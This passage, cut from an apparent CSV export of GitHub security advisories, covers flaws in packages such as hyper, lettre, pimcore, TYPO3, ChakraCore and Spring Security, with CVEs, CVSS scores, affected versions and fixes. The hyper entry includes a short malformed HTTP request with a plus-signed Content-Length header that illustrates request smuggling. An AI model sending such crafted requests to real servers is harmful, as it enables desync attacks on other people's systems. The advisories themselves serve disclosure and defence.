'com.amazonaws:aws-encryption-sdk-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'aws-encryption-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/google/security-research/security/advisories/GHSA-wqgp-vphw-hphf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8897'}, {'type': 'WEB', 'url': 'https://aws.amazon.com/blogs/security/improved-client-side-encryption-explicit-keyids-and-key-commitment/'}]","{'cwe_ids': ['CWE-327'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:24:29Z', 'nvd_published_at': '2020-11-16T12:15:00Z'}" +1.4.0,GHSA-vj62-g63v-f8mf,2021-10-13T17:34:31Z,2021-10-13T18:53:38Z,,['CVE-2021-41138'],Validity check missing in Frontier,"### Impact + +In the newly introduced signed Frontier-specific extrinsic for `pallet-ethereum`, a large part of transaction validation logic was only called in transaction pool validation, but not in block execution. Malicious validators can take advantage of this to put invalid transactions into a block. + +The attack is limited in that the signature is always validated, and the majority of the validation is done again in the subsequent `pallet-evm` execution logic. However, do note that a chain ID replay attack was possible. In addition, spamming attacks are of main concerns, while they are limited by Substrate block size limits and other factors. + +### Patches + +The issue is patched in commit 146bb48849e5393004be5c88beefe76fdf009aba. + +### References + +Patch PR: https://github.com/paritytech/frontier/pull/495 + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue in [Frontier repo](https://github.com/paritytech/frontier/issues) + +### Special thanks + +Special thanks to @librelois, @nanocryk and the Moonbeam team for reporting and fixing this security vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'frontier'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/paritytech/frontier/security/advisories/GHSA-vj62-g63v-f8mf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41138'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/frontier/pull/495'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/frontier/pull/497'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/frontier/commit/146bb48849e5393004be5c88beefe76fdf009aba'}, {'type': 'PACKAGE', 'url': 'https://github.com/paritytech/frontier'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-13T17:34:31Z', 'nvd_published_at': '2021-10-13T16:15:00Z'}" +1.4.0,GHSA-cvhw-2593-5j2q,2021-11-18T15:34:33Z,2021-10-12T22:00:08Z,,['CVE-2016-1516'],Double Free in OpenCV,OpenCV 3.0.0 has a double free issue that allows attackers to execute arbitrary code. This issue was fixed in OpenCV version 3.3.1 (corresponding to OpenCV-Python and and OpenCV-Contrib-Python 3.3.1.11).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.10'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.10'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1516'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/5956'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'WEB', 'url': 'https://arxiv.org/pdf/1701.04739.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T18:44:07Z', 'nvd_published_at': '2017-04-10T03:59:00Z'}" +1.4.0,GHSA-6cc6-66f5-mxjj,2021-07-27T13:43:59Z,2021-07-28T18:58:03Z,,['CVE-2020-0826'],Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0826'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0826'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T13:43:59Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}" +1.4.0,GHSA-g8jx-66p8-vcm2,2021-07-28T17:37:01Z,2021-07-13T17:42:31Z,,['CVE-2021-23405'],SQL injection in pimcore/pimcore,This affects the package pimcore/pimcore before 10.0.7. This issue exists due to the absence of check on the storeId parameter in the method collectionsActionGet and groupsActionGet method within the ClassificationstoreController class.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.0.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23405'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/9572'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-1316297'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-13T16:18:51Z', 'nvd_published_at': '2021-07-09T13:15:00Z'}" +1.4.0,GHSA-jxhc-q857-3j6g,2021-08-30T22:21:20Z,2021-07-12T16:58:33Z,,['CVE-2021-32740'],Regular Expression Denial of Service in Addressable templates,"### Impact + +Within the URI template implementation in Addressable, a maliciously crafted template may result in uncontrolled resource consumption, leading to denial of service when matched against a URI. In typical usage, templates would not normally be read from untrusted user input, but nonetheless, no previous security advisory for Addressable has cautioned against doing this. Users of the parsing capabilities in Addressable but not the URI template capabilities are unaffected. + +### Patches + +The vulnerability was introduced in version 2.3.0 (previously yanked) and has been present in all subsequent versions up to, and including, 2.7.0. It is fixed in version 2.8.0. + +### Workarounds + +The vulnerability can be avoided by only creating Template objects from trusted sources that have been validated not to produce catastrophic backtracking. + +### References + +- https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS +- https://cwe.mitre.org/data/definitions/1333.html +- https://www.regular-expressions.info/catastrophic.html + +### For more information +If you have any questions or comments about this advisory: +* [Open an issue](https://github.com/sporkmonger/addressable/issues) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'addressable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.8.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.7.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/sporkmonger/addressable/security/advisories/GHSA-jxhc-q857-3j6g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32740'}, {'type': 'WEB', 'url': 'https://github.com/sporkmonger/addressable/commit/0d8a3127e35886ce9284810a7f2438bff6b43cbc'}, {'type': 'WEB', 'url': 'https://github.com/sporkmonger/addressable/commit/89c76130ce255c601f642a018cb5fb5a80e679a7'}, {'type': 'WEB', 'url': 'https://github.com/sporkmonger/addressable/commit/92685096b1f7235ed8986c03ce30a24972eed848#diff-fb36d3dc67e6565ffde17e666a98697f48e76dac38fabf1bb9e97cdf3b583d76'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-jxhc-q857-3j6g'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/addressable/CVE-2021-32740.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/sporkmonger/addressable'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SDFQM2NHNAZ3NNUQZEJTYECYZYXV4UDS/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WYPVOOQU7UB277UUERJMCNQLRCXRCIQ5/'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-06T15:25:32Z', 'nvd_published_at': '2021-07-06T15:15:00Z'}" +1.4.0,GHSA-f3pg-qwvg-p99c,2021-09-07T21:49:21Z,2021-07-12T16:54:20Z,,['CVE-2021-32715'],Lenient Parsing of Content-Length Header When Prefixed with Plus Sign,"### Summary + +hyper's HTTP/1 server code had a flaw that incorrectly parses and accepts requests with a `Content-Length` header with a prefixed plus sign, when it should have been rejected as illegal. This combined with an upstream HTTP proxy that doesn't parse such `Content-Length` headers, but forwards them, can result in ""request smuggling"" or ""desync attacks"". + +### Vulnerability + +The flaw exists in all prior versions of hyper, if built with [`rustc` v1.5.0 or newer](https://github.com/rust-lang/rust/pull/28826/commits/123a83326fb95366e94a3be1a74775df4db97739). + +Example: + +``` +GET / HTTP/1.1 +Host: example.com +Content-Length: +3 + +abc +``` + +This request gets accepted and hyper reads the body as abc. The request _should_ be rejected, according to RFC 7230, since the ABNF for `Content-Length` only allows for `DIGIT`s. This is due to using the `FromStr` implementation for `u64` in the standard library. By differing from the spec, it is possible to send requests like these to endpoints that have different HTTP implementations, with different interpretations of the payload semantics, and cause ""desync attacks"". + +In this particular case, an upstream proxy would need to error when parsing the `Content-Length`, but _not_ reject the request (swallowing its own error), and forwarding the request as-is with the `Content-Length` still included. _Then_ the upstream proxy and hyper would disagree on the length of the request body. The combination of these factors would be extremely rare. + +Read more about desync attacks: https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn + +### Impact + +To determine if vulnerable, all these things must be true: + +- **Using hyper as an HTTP server**. While the lenient decoder also exists in the client, a vulnerability does not exist around _responses_. +- **Using HTTP/1**. The HTTP/2 code uses a stricter parser. +- **Using a vulnerable HTTP proxy upstream to hyper**. If an upstream proxy correctly rejects the illegal `Content-Length` header, *OR* can parse the length with the plus sign, the desync attack cannot succeed. + +### Patches + +We have released the following patch versions: + +- v0.14.10 (to be released when this advisor is published) + +### Workarounds + +Besides upgrading hyper, you can take the following options: + +- Reject requests manually that contain a plus sign prefix in the `Content-Length` header. +- Ensure any upstream proxy handles `Content-Length` headers with a plus sign prefix. + +### Credits +This issue was initially reported by [Mattias Grenfeldt](https://grenfeldt.dev/) and Asta Olofsson.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'hyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.14.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hyperium/hyper/security/advisories/GHSA-f3pg-qwvg-p99c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32715'}, {'type': 'WEB', 'url': 'https://github.com/rust-lang/rust/pull/28826/commits/123a83326fb95366e94a3be1a74775df4db97739'}, {'type': 'WEB', 'url': 'https://github.com/hyperium/hyper/commit/1fb719e0b61a4f3d911562a436a2ff05fd7cb759'}, {'type': 'PACKAGE', 'url': 'https://github.com/hyperium/hyper'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0078.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-07-07T20:08:46Z', 'nvd_published_at': '2021-07-07T20:15:00Z'}" +1.4.0,GHSA-2qgv-2cv4-g4cg,2021-07-27T14:12:10Z,2021-07-28T18:57:27Z,,['CVE-2020-0832'],Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0832'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0832'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T14:12:10Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}" +1.4.0,GHSA-3x9f-74h4-2fqr,2022-02-08T21:02:16Z,2021-07-22T19:48:17Z,,['CVE-2021-32012'],Denial of Service in SheetJS Pro,SheetJS Pro through 0.16.9 allows attackers to cause a denial of service (memory consumption) via a crafted .xlsx document that is mishandled when read by xlsx.js (issue 1 of 2).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'xlsx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:xlsx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32012'}, {'type': 'WEB', 'url': 'https://floqast.com/engineering-blog/post/fuzzing-and-parsing-securely/'}, {'type': 'WEB', 'url': 'https://sheetjs.com/pro'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/xlsx/v/0.17.0'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-19T21:44:38Z', 'nvd_published_at': '2021-07-19T14:15:00Z'}" +1.4.0,GHSA-r9w6-rhh9-7v53,2021-07-27T15:08:01Z,2021-07-28T17:57:57Z,,['CVE-2020-7955'],Incorrect Authorization in HashiCorp Consul,"HashiCorp Consul and Consul Enterprise 1.4.1 through 1.6.2 did not uniformly enforce ACLs across all API endpoints, resulting in potential unintended information disclosure. Fixed in 1.6.3.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.1'}, {'fixed': '1.6.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.6.2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7955'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/issues/7160'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/consul/'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T15:08:01Z', 'nvd_published_at': '2020-01-31T13:15:00Z'}" +1.4.0,GHSA-7638-r9r3-rmjj,2023-08-29T18:32:51Z,2021-07-19T15:19:09Z,,['CVE-2021-3602'],Buildah processes using chroot isolation may leak environment values to intermediate processes,"### Impact +When running processes using ""chroot"" isolation, the process being run can examine the environment variables of its immediate parent and grandparent processes (CVE-2021-3602). This isolation type is often used when running `buildah` in unprivileged containers, and it is often used to do so in CI/CD environments. If sensitive information is exposed to the original `buildah` process through its environment, that information will unintentionally be shared with child processes which it starts as part of handling RUN instructions or during `buildah run`. The commands that `buildah` is instructed to run can read that information if they choose to. + +### Patches +Users should upgrade packages, or images which contain packages, to include version 1.21.3 or later. + +### Workarounds +As a workaround, invoking `buildah` in a container under `env -i` to have it started with a reinitialized environment should prevent the leakage. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [buildah](https://github.com/containers/buildah/issues) +* Email us at [the buildah general mailing list](mailto:buildah@lists.buildah.io), or [the podman security mailing list](mailto:security@lists.podman.io) if it's sensitive.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/containers/buildah'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.16.7'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containers/buildah'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.17.0'}, {'fixed': '1.17.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.17.1'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containers/buildah'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.18.0'}, {'fixed': '1.19.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.19.8'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containers/buildah'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.20.0'}, {'fixed': '1.21.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.21.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/containers/buildah/security/advisories/GHSA-7638-r9r3-rmjj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3602'}, {'type': 'WEB', 'url': 'https://github.com/containers/buildah/commit/a468ce0ffd347035d53ee0e26c205ef604097fb0'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1969264'}, {'type': 'PACKAGE', 'url': 'https://github.com/containers/buildah'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0345'}, {'type': 'WEB', 'url': 'https://ubuntu.com/security/CVE-2021-3602'}]","{'cwe_ids': ['CWE-200', 'CWE-212'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-15T20:26:57Z', 'nvd_published_at': '2022-03-03T19:15:00Z'}" +1.4.0,GHSA-qc36-q22q-cjw3,2021-08-18T18:52:26Z,2021-07-12T17:03:27Z,,['CVE-2021-38189'],SMTP command injection in lettre,"### Impact + +Affected versions of lettre allowed SMTP command injection through an attacker's controlled message body. The module for escaping lines starting with a period wouldn't catch a period that was placed after a double CRLF sequence, allowing the attacker to end the current message and write arbitrary SMTP commands after it. + +### Fix + +The flaw is fixed by correctly handling consecutive CRLF sequences. + +### References + +* [RUSTSEC-2021-0069](https://rustsec.org/advisories/RUSTSEC-2021-0069.html) + + + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'lettre'}, 'ecosystem_specific': {'affected_functions': ['lettre::smtp::SmtpTransport::send', 'lettre::transport::smtp::SmtpTransport::send', 'lettre::transport::smtp::SmtpTransport::send_raw']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.7.0'}, {'fixed': '0.9.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/lettre/lettre/security/advisories/GHSA-qc36-q22q-cjw3'}, {'type': 'WEB', 'url': 'https://github.com/lettre/lettre/pull/627/commits/93458d01fed0ec81c0e7b4e98e6f35961356fae2'}, {'type': 'WEB', 'url': 'https://github.com/lettre/lettre/commit/8bfc20506cc5e098fe6eb3d1cafe3bea791215ce'}, {'type': 'PACKAGE', 'url': 'https://github.com/lettre/lettre'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0069.html'}]","{'cwe_ids': ['CWE-147'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T20:41:39Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-j89m-gcjf-6ghp,2021-07-27T14:28:19Z,2021-07-28T18:57:02Z,,['CVE-2020-0825'], Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0825'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0825'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T14:28:19Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}" +1.4.0,GHSA-rgcg-28xm-8mmw,2021-07-22T19:37:32Z,2021-07-22T19:37:41Z,,['CVE-2021-32669'],Cross-Site Scripting in Backend Grid View,"### Problem +Failing to properly encode settings for _backend layouts_, the corresponding grid view is vulnerable to persistent cross-site scripting. A valid backend user account is needed to exploit this vulnerability. + +### Solution +Update to TYPO3 versions 8.7.41 ELTS, 9.5.28, 10.4.18, 11.3.1 that fix the problem described. + +### Credits +Thanks to TYPO3 core merger Oliver Bartsch who reported and fixed the issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.7.41'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.28'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.18'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-rgcg-28xm-8mmw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32669'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-011'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-20T17:43:42Z', 'nvd_published_at': '2021-07-20T16:15:00Z'}" +1.4.0,GHSA-w9jg-gvgr-354m,2022-03-30T21:15:14Z,2021-07-02T18:33:34Z,,['CVE-2021-22119'],Resource Exhaustion in Spring Security,"Spring Security versions 5.5.x prior to 5.5.1, 5.4.x prior to 5.4.7, 5.3.x prior to 5.3.10 and 5.2.x prior to 5.2.11 are susceptible to a Denial-of-Service (DoS) attack via the initiation of the Authorization Request in an OAuth 2.0 Client Web and WebFlux application. A malicious user or attacker can send multiple requests initiating the Authorization Request for the Authorization Code Grant, which has the potential of exhausting system resources using a single session or multiple sessions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.5.0'}, {'fixed': '5.5.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.4.0'}, {'fixed': '5.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.3.0'}, {'fixed': '5.3.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.3.9'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.0'}, {'fixed': '5.2.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.10'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-oauth2-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.5.0'}, {'fixed': '5.5.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-oauth2-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.4.0'}, {'fixed': '5.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-oauth2-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.3.0'}, {'fixed': '5.3.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.3.9'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-oauth2-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.0'}, {'fixed': '5.2.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.10'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22119'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-security/pull/9513'}, {'type': 'PACKAGE', 'url': 'https://github.com/spring-projects/spring-security'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r08a449010786e0bcffa4b5781b04fcb55d6eafa62cb79b8347680aad@%3Cissues.nifi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r163b3e4e39803882f5be05ee8606b2b9812920e196daa2a82997ce14@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3868207b967f926819fe3aa8d33f1666429be589bb4a62104a49f4e3@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r390783b3b1c59b978131ac08390bf77fbb3863270cbde59d5b0f5fde@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r89aa1b48a827f5641310305214547f1d6b2101971a49b624737c497f@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra53677224fe4f04c2599abc88032076faa18dc84b329cdeba85d4cfc@%3Cpluto-scm.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://tanzu.vmware.com/security/cve-2021-22119'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-400', 'CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-30T17:30:10Z', 